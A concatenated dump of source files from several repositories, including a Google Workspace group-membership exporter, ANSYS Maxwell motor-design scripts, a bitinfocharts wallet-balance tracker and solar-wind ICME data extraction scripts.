print( "All done.")
print( "========================================================")
log.debug("========================================================")
``` |
{
"source": "jim-snyder-grant/google-admin-scripts",
"score": 3
} |
#### File: jim-snyder-grant/google-admin-scripts/groups.py
```python
HELP = "Extracts the emails from every group list in a given domain.\n\
Usage: python groups.py DOMAIN [CSV] [TEXT] \n\
DOMAIN - the domain to use, e.g mydomain.com\n\
optional output format arguments: \n\
TEXT (default) output as text\n\
CSV output as CSV\n\
"
import enum
import json
import os
import pickle
import sys
import google_auth_oauthlib
from google.auth.transport.requests import AuthorizedSession, Request
from google_auth_oauthlib.flow import InstalledAppFlow
from requests_oauthlib import OAuth2Session
#DOMAIN, name of the domain to work with
#DOMAIN = ''
# CLIENT_SECRETS, name of a file containing the OAuth 2.0 information for this
# application, including client_id and client_secret, which are found
# on the API Access tab on the Google APIs
# Console <http://code.google.com/apis/console>
CLIENT_SECRETS = 'client_secrets.json'
def get_creds():
scopes = ['https://www.googleapis.com/auth/admin.directory.group.member.readonly',
'https://www.googleapis.com/auth/admin.directory.group.readonly']
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(CLIENT_SECRETS, scopes=scopes)
creds = flow.run_local_server()
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return creds
class Group:
class GroupType(enum.Enum):
Unknown = 0
Group = 1
Alias = 2
User = 3
Empty = 4
def __init__(self, group_json):
self.name = group_json['name']
self.email = group_json['email']
self.description = group_json['description']
self.type = Group.GroupType.Unknown
self.emails = {self.email}
if 'aliases' in group_json:
self.add_aliases(group_json['aliases'])
self.members = set()
def add_aliases(self, aliases: list[str]):
self.emails.update(aliases)
def create_groups(session, domain):
r = session.get('https://admin.googleapis.com/admin/directory/v1/groups',
params={'domain': domain, 'maxResults': 5000})
json_groups = r.json()['groups']
groups = {}
for g in json_groups:
if g['name'] == 'everyone':
continue
group = Group(g)
group.type = Group.GroupType.Group
if (0 == int(g['directMembersCount'])):
group.type = Group.GroupType.Empty
groups[g['email']] = group
return groups
def handle_aliases(groups):
for g in [g for g in groups.values() if g.type == Group.GroupType.Alias]:
assert(len(g.members) == 1)
target_email = next(iter(g.members))
if not target_email in groups:
# Reference to a user - this is actually a one member group
g.type = Group.GroupType.Group
continue
target = groups[target_email]
if target.type == Group.GroupType.Alias:
raise Exception('Alias to Alias not supported')
elif target.type == Group.GroupType.Group:
target.add_aliases(g.emails)
else:
# Target is a user - this is a one member group
g.type = Group.GroupType.Group
def list_group_members(session, groups, group):
if group.members:
# members already listed
return
r = session.get('https://admin.googleapis.com/admin/directory/v1/groups/{group_id}/members'.format(group_id=group.email))
if (group.type == Group.GroupType.Empty):
json_members = [{'email' : '(empty group)'}]
else:
json_members = r.json()['members']
for member in json_members:
member_email = member['email']
if member_email in groups:
target_group = groups[member_email]
if target_group.type == Group.GroupType.Group:
member_email = '~' + member_email
group.members.add(member_email.lower())
def list_members(session, groups):
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}] :
list_group_members(session, groups, g)
def print_groups(groups, domain, useCSV, useTEXT):
if useCSV:
with open(domain+'.list.csv', 'w') as fCSV:
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}]:
for member in sorted(g.members):
print(member + "," + g.name,file=fCSV)
print("created and filled " + fCSV.name)
if useTEXT:
with open(domain+'.list.txt', 'w') as fTXT:
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}]:
print (g.name, file=fTXT)
if g.description:
print(g.description, file=fTXT)
print(sorted(g.emails),file=fTXT)
for member in sorted(g.members):
print(member,file=fTXT)
print("",file=fTXT)
print("created and filled " + fTXT.name)
def main(argv):
sample = open('samplefile.txt', 'w')
print('GeeksForGeeks', file = sample)
sample.close()
argc = len(argv)
if 1 == argc:
print(HELP)
exit(0)
domain = argv[1]
print("Domain: " + domain)
hasCSV = "CSV" in argv
hasTEXT = "TEXT" in argv
#TEXT is the default
if not hasTEXT and not hasCSV:
hasTEXT = True
if (hasTEXT):
print("using text format")
if (hasCSV):
print("using csv format")
session = AuthorizedSession(get_creds())
groups = create_groups(session, domain)
# handle_aliases(groups)
list_members(session, groups)
print_groups(groups, domain, hasCSV, hasTEXT)
if __name__ == '__main__':
main(sys.argv)
``` |
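The HELP string above documents the command-line usage; an equivalent programmatic call would look roughly like the sketch below (the domain is a placeholder, and a valid client_secrets.json plus completing the OAuth flow are required):

```python
# Roughly equivalent to: python groups.py example.com CSV TEXT
from groups import main

main(['groups.py', 'example.com', 'CSV', 'TEXT'])
# writes example.com.list.csv and example.com.list.txt in the working directory
```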
{
"source": "JimsPalo/MotorDesignSPMSM",
"score": 2
} |
#### File: ANSYSDesign/AnalysisSetup/AnalysisSetup.py
```python
def AnalysisSetup(main):
"""This function sets up the configuration for the analysis.
Args:
main (Dic): Main dictionary used to pass the necessary information.
Returns:
Dic: the main dictionary updated with the oModule object used for the analysis setup.
"""
# oDesign definition
oDesign = main['ANSYS']['oDesign']
# Set core losses
oModule = oDesign.GetModule("BoundarySetup")
oModule.SetCoreLoss(["Stator", "Rotor"], False)
# Defining the necessary module
oModule = oDesign.GetModule("AnalysisSetup")
# Multiplier
Multiplier = main['ANSYS']['AnalysisSetup']['Multiplier']
# Analysis name
AnalysisName = main['ANSYS']['AnalysisSetup']['Name']
# PercentError
PercentError = main['ANSYS']['AnalysisSetup']['PercentError']
# RefinementPerPass
RefinementPerPass = main['ANSYS']['AnalysisSetup']['RefinementPerPass']
# NonLinearResidual
NonLinearResidual = main['ANSYS']['AnalysisSetup']['NonLinearResidual']
# Design Settings
oDesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=", False,
"EnabledObjects:=" , [],
"PreserveTranSolnAfterDatasetEdit:=", False,
"ComputeTransientInductance:=", False,
"ComputeIncrementalMatrix:=", False,
"PerfectConductorThreshold:=", 1E+30,
"InsulatorThreshold:=" , 1,
"ModelDepth:=" , "Lenght",
"UseSkewModel:=" , False,
"EnableTranTranLinkWithSimplorer:=", False,
"BackgroundMaterialName:=", "vacuum",
"SolveFraction:=" , False,
"Multiplier:=" , str(Multiplier)
],
[
"NAME:Model Validation Settings",
"EntityCheckLevel:=" , "Strict",
"IgnoreUnclassifiedObjects:=", False,
"SkipIntersectionChecks:=", False
]
)
# Analysis setup
oModule.InsertSetup(
"Transient",
[
"NAME:" + AnalysisName,
"Enabled:=" , True,
[
"NAME:MeshLink",
"ImportMesh:=" , False
],
"NonlinearSolverResidual:=", "1e-06",
"TimeIntegrationMethod:=", "BackwardEuler",
"SmoothBHCurve:=" , False,
"StopTime:=" , "20ms",
"TimeStep:=" , "300us",
"OutputError:=" , False,
"UseControlProgram:=" , False,
"ControlProgramName:=" , " ",
"ControlProgramArg:=" , " ",
"CallCtrlProgAfterLastStep:=", False,
"FastReachSteadyState:=", False,
"AutoDetectSteadyState:=", False,
"IsGeneralTransient:=" , True,
"IsHalfPeriodicTransient:=", False,
"SaveFieldsType:=" , "Custom",
[
"NAME:SweepRanges",
[
"NAME:Subrange",
"RangeType:=" , "LinearStep",
"RangeStart:=" , "0ms",
"RangeEnd:=" , "20ms",
"RangeStep:=" , "300us"
]
],
"UseNonLinearIterNum:=" , False,
"CacheSaveKind:=" , "Count",
"NumberSolveSteps:=" , 1,
"RangeStart:=" , "0s",
"RangeEnd:=" , "0.1s",
"UseAdaptiveTimeStep:=" , False,
"InitialTimeStep:=" , "0.002s",
"MinTimeStep:=" , "0.001s",
"MaxTimeStep:=" , "0.003s",
"TimeStepErrTolerance:=", 0.0001
]
)
main['ANSYS']['AnalysisSetup']['oModule'] = oModule
# Developing the all analysis
# oDesign.AnalyzeAll()
print(oDesign.GetPostProcessingVariables())
return main
```
#### File: ANSYSDesign/MainOperations/OpenAnsoft.py
```python
from win32com import client
def OpenAnsoft(main):
"""Open ANSYS Electronics Application.
Args:
main (Dic): Contains the main information.
Returns:
Dic: The main dictionary updated with the ANSYS handle objects (oDesktop, oProject, oDesign, oEditor).
"""
# Loading variables
ProjectName = main['ANSYS']['ProjectName']
DesignName = main['ANSYS']['DesignName']
# oDesktop object
oAnsoftApp = client.Dispatch('Ansoft.ElectronicsDesktop')
oDesktop = oAnsoftApp.GetAppDesktop()
# Restore a minimized window
oDesktop.RestoreWindow()
# oProject object
oProject = oDesktop.NewProject(ProjectName)
# oDefinitionManager
oDefinitionManager = oProject.GetDefinitionManager()
# oDesign object
oProject.InsertDesign('Maxwell 2D', DesignName, "Transient", '')
oDesign = oProject.SetActiveDesign(DesignName)
# Design view
oEditor = oDesign.SetActiveEditor("3D Modeler")
# updating variables
main['ANSYS']['oAnsoftApp'] = oAnsoftApp
main['ANSYS']['oDesktop'] = oDesktop
main['ANSYS']['oProject'] = oProject
main['ANSYS']['Materials']['oDefinitionManager'] = oDefinitionManager
main['ANSYS']['oDesign'] = oDesign
main['ANSYS']['oEditor'] = oEditor
return main
```
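OpenAnsoft only reads a few keys from `main` before filling in the ANSYS handles; a minimal sketch of the expected dictionary shape is below (the project and design names are illustrative, and ANSYS Electronics Desktop must be installed on Windows for the COM dispatch to succeed):

```python
main = {
    'ANSYS': {
        'ProjectName': 'SPMSM_Design',   # illustrative names, not from the repo
        'DesignName': 'Motor2D',
        'Materials': {},                 # OpenAnsoft stores oDefinitionManager here
    }
}
main = OpenAnsoft(main)
oEditor = main['ANSYS']['oEditor']       # 3D Modeler editor of the new Maxwell 2D design
```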
#### File: ANSYSDesign/Materials/StatorMaterial.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
def StatorMaterial(main):
"""This function adds the stator material
Args:
main (Dic): Main dictionary used to upload the information
Returns:
Dic: The main dictionary updated with the stator material data (B-H interpolators, knee point, mass density).
"""
# oDefinitionManager
oDefinitionManager = main['ANSYS']['Materials']['oDefinitionManager']
# Material Name
StatorMaterialName = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialBHCurve.csv',
dtype='str', skiprows=2, usecols=1, unpack=True, delimiter=',', max_rows=1)
# BH curve
H, B = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialBHCurve.csv',
skiprows=5, unpack=True, delimiter=',')
# Core Losses Curves
# frequencies
frequencies = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
dtype='str', skiprows=7, unpack=True, delimiter=',', max_rows=1)
frequencies = frequencies[1:]
# Curves
CoreLoss = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
skiprows=9, unpack=True, delimiter=',')
# Units
Units = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
dtype='str', skiprows=4, usecols=1, unpack=True, delimiter=',', max_rows=1)
Units = str(Units).split('/')
# Mass density in kg/m^3
MassDensity = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
skiprows=5, usecols=1, unpack=True, delimiter=',', max_rows=1)
# Generating the argument for the core losses
InitialCurve = ["NAME:AllCurves"]
for freq in frequencies:
points = ["NAME:Points"]
for i, k in enumerate(CoreLoss[0, :]):
points.append(k),
points.append(CoreLoss[1, i])
ForFreq = [
"NAME:OneCurve",
"Frequency:=", freq+"Hz",
[
"NAME:Coordinates",
[
"NAME:DimUnits",
"",
""
],
points
]
]
InitialCurve.append(ForFreq)
# Generation of the data for the BH curve
InitialCurveBH = ["NAME:BHCoordinates", ["NAME:DimUnits", "", ""]]
for i, h in enumerate(H):
InitialCurveBH.append(["NAME:Point", h, B[i]])
# Uploading in Ansoft
oDefinitionManager.AddMaterial(
[
"NAME:"+str(StatorMaterialName),
"CoordinateSystemType:=", "Cartesian",
"BulkOrSurfaceType:=", 1,
[
"NAME:PhysicsTypes",
"set:=", ["Electromagnetic"]
],
[
"NAME:AttachedData",
[
"NAME:CoreLossMultiCurveData",
"property_data:=", "coreloss_multi_curve_data",
"coreloss_unit:=", Units[0]+"_per_"+Units[1],
InitialCurve
]
],
[
"NAME:permeability",
"property_type:=", "nonlinear",
"BTypeForSingleCurve:=", "normal",
"HUnit:=", "A_per_meter",
"BUnit:=", "tesla",
"IsTemperatureDependent:=", False,
InitialCurveBH,
[
"NAME:Temperatures"
]
],
[
"NAME:magnetic_coercivity",
"property_type:=", "VectorProperty",
"Magnitude:=", "0A_per_meter",
"DirComp1:=", "1",
"DirComp2:=", "0",
"DirComp3:=", "0"
],
[
"NAME:core_loss_type",
"property_type:=", "ChoiceProperty",
"Choice:=", "Electrical Steel"
],
"core_loss_kh:=", "184.233670546732",
"core_loss_kc:=", "0.386260592696451",
"core_loss_ke:=", "0.270231418332487",
"core_loss_kdc:=", "0",
"mass_density:=", str(MassDensity),
"core_loss_equiv_cut_depth:=", "0.001meter"
]
)
# B-H Curve Interpolation----------------------------------------------------------------
# Converting H to kA/m
H = H/1000
# Redefining useful range
# Keep only the region where the slope exceeds tan(2.5 degrees)
BHslop = (B[1:]-B[:-1])/((H[1:]-H[:-1]))-np.tan(np.pi*2.5/180)
HUseful = H[:-1][BHslop > 0.]
BUseful = B[:-1][BHslop > 0.]
# Interpolation using cubic spline
p = interp1d(HUseful, BUseful, kind='cubic')
p2 = interp1d(BUseful, HUseful, kind='cubic')
# Supersampling the B-H curve
Hnew = np.linspace(min(HUseful), max(HUseful), 10000)
Bnew = p(Hnew)
# Knee point finding
slop = (Bnew[1:]-Bnew[:-1])/((Hnew[1:]-Hnew[:-1]))-np.tan(45/180*np.pi)
HKnee = np.mean(Hnew[:-1][np.abs(slop) < 0.01])
fig, ax = plt.subplots(1, 1, figsize=(8, 4))
ax.plot(Hnew, Bnew, 'k', label='B-H Curve interp.')
ax.plot(HKnee, p(HKnee), 'x', label='Knee point')
ax.scatter(H, B, label='Data Points')
# Figure labeling
ax.legend(loc='lower right')
ax.set_xlim(min(HUseful), max(HUseful))
ax.set_ylim(min(BUseful), max(BUseful))
ax.set_ylabel(r'$B [T]$', fontsize=18)
ax.set_xlabel(r'$H [kA/m]$', fontsize=18)
# plt.show()
# Saving in main object
StatorMaterial = {}
StatorMaterial['StatorMaterialName'] = StatorMaterialName
# Saving the BH Curve ans HB Curve
StatorMaterial['BHCurve'] = [p, p2]
StatorMaterial['KneePoint'] = [HKnee, p(HKnee)]
StatorMaterial['MassDensity'] = MassDensity
main['ANSYS']['Materials']['Stator'] = StatorMaterial
return main
```
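After `StatorMaterial(main)` has run, the stored B-H interpolators and knee point can be read back from the dictionary; a short sketch (H is in kA/m, and queries are only valid inside the measured interpolation range):

```python
stator = main['ANSYS']['Materials']['Stator']
BH, HB = stator['BHCurve']          # B(H) and its inverse H(B)
HKnee, BKnee = stator['KneePoint']  # knee of the curve
print('Knee at H = %.3f kA/m, B = %.3f T' % (HKnee, BKnee))
print('B at H = 2 kA/m:', BH(2.0))  # valid only if 2 kA/m lies inside the measured range
```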
#### File: ANSYSDesign/Model/Region.py
```python
def Region(main):
"""This function creates the region and sets the boundaries for the
FEM analysis of the machine.
Args:
main (Dic): Main dictionary that contains the necessary information.
Returns:
Dic: unmodified main dictionary.
"""
oEditor = main['ANSYS']['oEditor']
oDesign = main['ANSYS']['oDesign']
RegionName = main['ANSYS']['Region']['RegionName']
oModule = oDesign.GetModule("BoundarySetup")
OffsetPercent = main['ANSYS']['Region']['OffsetPercent']
# Drawing the Region
oEditor.CreateCircle(
[
"NAME:CircleParameters",
"IsCovered:=" , True,
"XCenter:=" , "0mm",
"YCenter:=" , "0mm",
"ZCenter:=" , "0mm",
"Radius:=" , "DiaYoke/2"+'*'+str(1+OffsetPercent/100),
"WhichAxis:=" , "Z",
"NumSegments:=" , "0"
],
[
"NAME:Attributes",
"Name:=" , RegionName,
"Flags:=" , "",
"Color:=" , "(143 175 143)",
"Transparency:=" , 0.75,
"PartCoordinateSystem:=", "Global",
"UDMId:=" , "",
"MaterialValue:=" , "\"vacuum\"",
"SurfaceMaterialValue:=", "\"\"",
"SolveInside:=" , True,
"ShellElement:=" , False,
"ShellElementThickness:=", "0mm",
"IsMaterialEditable:=" , True,
"UseMaterialAppearance:=", False,
"IsLightweight:=" , False
]
)
# Boundaries setting
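    # Forcing the magnetic vector potential to zero on the outer edge of the
    # region keeps the flux lines inside the solution domain (the usual outer
    # boundary for 2-D machine models).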
Edges = oEditor.GetEdgeIDsFromObject(RegionName)
oModule.AssignVectorPotential(
[
"NAME:VectorPotential1",
"Edges:=" , [int(Edges[0])],
"Value:=" , "0",
"CoordinateSystem:=" , ""
]
)
oEditor.FitAll()
return main
``` |
{
"source": "Jimsparkle/bitinfo_holding_alert",
"score": 3
} |
#### File: src/bitinfo_holding_alert/main.py
```python
import logging
import sys
from typing import Optional
from bitinfo_holding_alert.config import TRACK_ADDRESS, TRACK_COIN
from bitinfo_holding_alert.scrap import get_wallet_holding_data
from bitinfo_holding_alert.cal import produce_time_series
LOGGER = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
LOGGER.addHandler(handler)
LOGGER.setLevel(logging.DEBUG)  # without this, the INFO messages below are filtered out by the default WARNING level
def bitinfo_holding_ts(
track_addr: Optional[str] = None,
track_coin: Optional[str] = None,
timeframe: Optional[str] = "4h",
sma: Optional[int] = 20,
):
"""Scrap the data from bitinfo and calculate the balance based on the resample frequency.
track_addr (str): The address to track.
track_coin (str): The coin to track.
timeframe (str): The resample frequency.
sma (int): The moving average window.
For example, if the website url is
https://bitinfocharts.com/dogecoin/address/DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k-full/
track_coin value would be `dogecoin` and track_addr would be `DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k`.
    For timeframe, we support any frequency listed in the pandas docs; common values are '4h', '1h', '1d'.
    Full list of available timeframes: https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases
"""
LOGGER.info(f"Scrapping data for {track_coin}, wallet address: {track_addr}")
track_addr = TRACK_ADDRESS if track_addr is None else track_addr
track_coin = TRACK_COIN if track_coin is None else track_coin
df_holding_ts = get_wallet_holding_data(
coin=track_coin,
address=track_addr,
)
balance_ts = produce_time_series(df_holding_ts, timeframe, sma)
return balance_ts
if __name__ == "__main__":
# balance_ts = bitinfo_holding_ts("DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k", "dogecoin", "4h", 20)
balance_ts = bitinfo_holding_ts("3FpYfDGJSdkMAvZvCrwPHDqdmGqUkTsJys", "bitcoin", "1h", 20)
print(balance_ts)
``` |
{
"source": "jimsrc/seatos",
"score": 2
} |
#### File: etc/etc/extract_struct.py
```python
from datetime import datetime, time, timedelta
from shared import shared_funcs as sf
import numpy as np
import argparse, os
#--- retrieve args
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'-inp', '--input',
type=str,
default='{HOME}/data_ace/64sec_mag-swepam/ace.1998-2014.nc'.format(**os.environ),
help='input filename of ACE data',
)
parser.add_argument(
'-in', '--inp_name',
type=str,
default='ACE',
help='name/flag of input data. Must be one of these: ACE, ACE_o7o6, Auger_BandMuons, Auger_BandScals, McMurdo.',
)
parser.add_argument(
'-rich', '--rich_csv',
type=str,
default='{ASO}/icmes_richardson/RichardsonList_until.2016.csv'.format(**os.environ),
help='.csv file for Richardson catalog of ICMEs',
)
parser.add_argument(
'-avr', '--avr',
type=str,
default='{ASO}/icmes_richardson/data/rich_events2_ace.nc'.format(**os.environ),
    help='.nc file with average values for the Richardson ICME events',
)
parser.add_argument(
'-dd', '--dir_data',
type=str,
default='../ascii',
help='directory for output data',
)
parser.add_argument(
'-dp', '--dir_plot',
type=str,
default='../plots',
help='directory for output plots',
)
parser.add_argument(
'-lim', '--limits',
type=float,
nargs=2,
default=[None,None], # no filter by default
help='limits for the values of the Vsw (SW speed), to define\
a filter of events. Recommended partition: 100, 450, 550, 3000.'
)
parser.add_argument(
'-obs', '--obs',
type=str,
nargs='+',
default=['B','rmsB'],
help="""
keyname of the variables to extract.
For ACE, use:
B, rmsB, rmsBoB, V, beta, Pcc, Temp, AlphaRatio.
For Auger_..., use:
CRs.
""",
)
parser.add_argument(
'-ts', '--tshift',
action='store_true',
default=False,
help='to perform a time-shift to ACE data, so that the\
time-stamps of data is consistent with Richardson\'s list of\
ICME borders.'
)
parser.add_argument(
'-if', '--icme_flag',
type=str,
default='2',
help="""
list of Richardson's ICME-flags. They are:
'0' for irregulars,
'1' for smooth B rotation,
'2' for MCs,
and '2H' for MCs by Huttunen etal05.
To specify several flags, separe by dots (e.g. '0.1.2H').
"""
)
parser.add_argument(
'-ba', '--BefAft',
type=int,
nargs=2,
default=[0,0],
help="""
    Fractions of the extraction time-span, in units of the time-width
    of the structure, taken before the leading border and after the
    trailing border respectively. Must be integers.
""",
)
parser.add_argument(
'-st', '--struct',
type=str,
default='sh.i', # sheath-of-icme
help='alias name of structure to analyze.\
Options are "sh.mc", "sh.i", "mc", "i" for sheath-of-mc, \
sheath-of-icme, mc, and icme respectively.',
)
parser.add_argument(
'-wang', '--wang',
type=float,
default=None,
help="""
If not used, ignores Wang's catalog. Otherwise, set a lower
threshold value to filter events according to its shock orientation,
using Wang's catalog.
NOTE: the orientation is 180 degrees close to the nose!
""",
metavar=('THRESHOLD',),
)
pa = parser.parse_args()
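# A hypothetical invocation (paths, flags and limits below are only
# illustrative; the defaults above point to the author's local files):
#   python extract_struct.py -st sh.i -obs B rmsB -if 2 -lim 100 450 \
#       -dd ../ascii -dp ../plots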
class boundaries:
def __init__(self):
name = 'name'
HOME = os.environ['HOME']
gral = sf.general()
day = 86400.
#---- input settings
gral.fnames = fnames = {}
fnames[pa.inp_name] = pa.input #'%s/data_ace/64sec_mag-swepam/ace.1998-2014.nc' % HOME
fnames['McMurdo'] = '%s/actividad_solar/neutron_monitors/mcmurdo/mcmurdo_utc_correg.dat' % HOME
fnames['table_richardson'] = pa.avr # .nc file w/ average values
#---- output directories
gral.dirs = dirs = {}
dirs['dir_plots'] = pa.dir_plot #'../plots'
dirs['dir_ascii'] = pa.dir_data #'../ascii'
dirs['suffix'] = '_test_Vmc_' # suffix for the output directory
#------- select MCs by their catalog label (lepping=2, etc.)
MCwant = {'flags': pa.icme_flag.split('.'), #('2',),
    'alias': pa.icme_flag } #'2'} # used to tag the figure names/paths
FILTER = {}
FILTER['Mcmultiple'] = False # True to include multi-MC events
FILTER['CorrShift'] = pa.tshift #True
FILTER['wang'] = pa.wang if pa.wang is not None else False #False/True
FILTER['vsw_filter'] = True
FILTER['z_filter_on'] = False
FILTER['MCwant'] = MCwant
FILTER['B_filter'] = False
FILTER['filter_dR.icme'] = False #True
FILTER['choose_1998-2006'] = False
CUTS = {}
CUTS['ThetaThres'] = 90.0 # all events with theta>ThetaThres
CUTS['dTday'] = 0.0
CUTS['v_lo'] = 550.0
CUTS['v_hi'] = 3000.0
CUTS['z_lo'] = -50.0
CUTS['z_hi'] = 0.65
nBin = {}
nBin['before'] = pa.BefAft[0] #2
nBin['after'] = pa.BefAft[1] #4
nBin['bins_per_utime'] = 50 # bins per unit of time
nBin['total'] = (1+nBin['before']+nBin['after'])*nBin['bins_per_utime']
fgap = 0.2
#--- structure borders (from Richardson's table)
tb = sf.RichTable(pa.rich_csv)
tb.read()
#--- structure borders
bounds = boundaries()
if pa.struct=='sh.i':
bounds.tini = tb.tshck #tb.tini_mc #tb.tshck
bounds.tend = tb.tini_icme #tb.tend_mc #tb.tini_mc
elif pa.struct=='sh.mc':
bounds.tini = tb.tshck
bounds.tend = tb.tini_mc
elif pa.struct=='i':
bounds.tini = tb.tini_icme
bounds.tend = tb.tend_icme
elif pa.struct=='mc':
bounds.tini = tb.tini_mc
bounds.tend = tb.tend_mc
else:
raise SystemExit(' ---> wrong structure! : '+pa.struct)
from copy import deepcopy
bounds = deepcopy(bounds)
from shared import readers
#+++++++++++++++++++++++++++++++++++++++++++++++++
gral.data_name = pa.inp_name #'ACE'
FILTER['vsw_filter'] = False
emgr = sf.events_mgr(gral, FILTER, CUTS, bounds, nBin, fgap, tb, None, structure=pa.struct, verbose=True)
#++++ limits
emgr.FILTER['vsw_filter'] = False if pa.limits==[None,None] else True
emgr.CUTS['v_lo'], emgr.CUTS['v_hi'] = pa.limits
emgr.filter_events()
emgr.load_files_and_timeshift_ii(
_data_handler = getattr(readers,'_data_'+emgr.data_name),
obs_check = pa.obs
)
emgr.rebine(collect_only=True)
# save to file
#---- dest directory
#assert os.path.isdir(pa.dir_data), \
# " ## ERROR ## --> doesn't exist: "+pa.dir_data
dir_dst = '%s/MCflag%s' % (pa.dir_data, FILTER['MCwant']['alias'])
if FILTER['CorrShift']:
dir_dst += '/wShiftCorr/events_data'
else:
dir_dst += '/woShiftCorr/events_data'
if not(os.path.isdir(dir_dst)): os.system('mkdir -p '+dir_dst)
#-------------------
events = emgr.out['events_data'].keys()
n_evnts = len(events)
nobs = len(pa.obs)
for id, i in zip(events, range(n_evnts)):
myid = int(id[3:])
#--- construct header/footer
dtsh = emgr.dt_sh[myid] # [days] sheath duration
dtmc = emgr.dt_mc[myid] # [days] MC duration
dt = (bounds.tend[myid]-bounds.tini[myid]).total_seconds()/86400.
HEADER=''+\
'ini ({struct}) : {date}'.format(
struct=pa.struct,
date=emgr.bd.tini[myid].strftime('%d %B %Y %H:%M'),
)+'\n'+\
'end ({struct}) : {date}'.format(
struct=pa.struct,
date=emgr.bd.tend[myid].strftime('%d %B %Y %H:%M'),
)
FOOTER=''+\
'dt [days]: %g\n' % dt +\
'dt_sheath [days]: %g\n' % dtsh +\
'dt_MC [days]: %g' % dtmc
#--- get the data
for obs, io in zip(pa.obs, range(nobs)):
buffer = emgr.out['events_data'][id][obs+'.'+emgr.data_name] # [dummy1]
data_out = np.array([buffer.time, buffer.data]).T
fname_out = '%s/event.data_%s_vlo.%04d_vhi.%04d_id.%03d.txt' % (dir_dst, obs+'.'+emgr.data_name, emgr.CUTS['v_lo'], emgr.CUTS['v_hi'], myid)
np.savetxt(fname_out,data_out,header=HEADER,footer=FOOTER,fmt='%g')
print " --> saved in: "+dir_dst
#EOF
```
#### File: src/icme.par/funcs.py
```python
from pylab import *
import numpy as np
from scipy.io.netcdf import netcdf_file
def make_plot(DIR_INP, FILTER, CUTS, nBin):
MCwant = FILTER['MCwant']
fgap = FILTER['fgap']
WangFlag = FILTER['WangFlag']
FNAME = 'MCflag%s_%dbefore.%dafter_fgap%1.1f' % (MCwant, nBin['before'], nBin['after'], fgap)
FNAME += '_Wang%s' % (WangFlag)
if FILTER['vsw_filter']:
FNAME += '_vlo.%03.1f.vhi.%04.1f' % (CUTS['v_lo'], CUTS['v_hi'])
if FILTER['z_filter_on']:
FNAME += '_zlo.%2.2f.zhi.%2.2f' % (CUTS['z_lo'], CUTS['z_hi'])
if FILTER['B_filter']:
FNAME += '_Blo.%2.2f.Bhi.%2.2f' % (CUTS['B_lo'], CUTS['B_hi'])
if FILTER['filter_dR.icme']:
FNAME += '_dRlo.%2.2f.dRhi.%2.2f' % (CUTS['dR_lo'], CUTS['dR_hi'])
fname_inp = DIR_INP + '/' + '_stuff_' + FNAME + '.nc'
finp = netcdf_file(fname_inp, 'r')
#print finp.variables; finp.close()
VARNAMES = finp.variables.keys()
prom = {}
for varname in VARNAMES:
if varname[:2]=='dt' or varname[:2]=='ID':
            continue # skip these variables
mvs = finp.variables[varname].data
prom[varname] = np.mean(mvs)
        del mvs # drop the reference to the file data
finp.close()
return prom
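# A minimal sketch of how make_plot() could be called (all values are
# hypothetical; the keys simply mirror the FILTER/CUTS/nBin dictionaries used
# elsewhere in this repo):
#   FILTER = {'MCwant': '2', 'fgap': 0.2, 'WangFlag': '90.0', 'vsw_filter': True,
#             'z_filter_on': False, 'B_filter': False, 'filter_dR.icme': False}
#   CUTS = {'v_lo': 550.0, 'v_hi': 3000.0}
#   nBin = {'before': 2, 'after': 4}
#   prom = make_plot('../ascii/MCflag2', FILTER, CUTS, nBin)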
```
#### File: n_CR/individual/_func_data.py
```python
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
def __init__(self):
self.name = ''
class mgr_data():
def __init__(self, dir_inp_sh, dir_inp_mc, fname_inp_part):
self.dir_inp_sh = dir_inp_sh
self.dir_inp_mc = dir_inp_mc
self.fname_inp_part = fname_inp_part
#self.vlo, self.vhi = vlo, vhi
def run(self, vlo, vhi):
"""
        Build the sheath/MC/CR profiles for the given speed range
        (vlo, vhi); the values are also stored in the member
        variables "self.vlo" and "self.vhi".
"""
dir_inp_sh = self.dir_inp_sh
dir_inp_mc = self.dir_inp_mc
fname_inp_part = self.fname_inp_part
sh, mc, cr = gral(), gral(), gral()
cr.sh, cr.mc = gral(), gral()
fname_inp = fname_inp_part+'_vlo.%4.1f.vhi.%4.1f'%(vlo, vhi)
self.vlo, self.vhi = vlo, vhi
#--- rmsB
fname_sh = dir_inp_sh + '/%s_rmsB.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_rmsB.txt' % fname_inp
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.rmsB = sh.data[0], sh.data[2]
mc.t, mc.rmsB = mc.data[0], mc.data[2]
#--- B
fname_sh = dir_inp_sh + '/%s_B.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_B.txt' % fname_inp
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.B = sh.data[0], sh.data[2]
mc.t, mc.B = mc.data[0], mc.data[2]
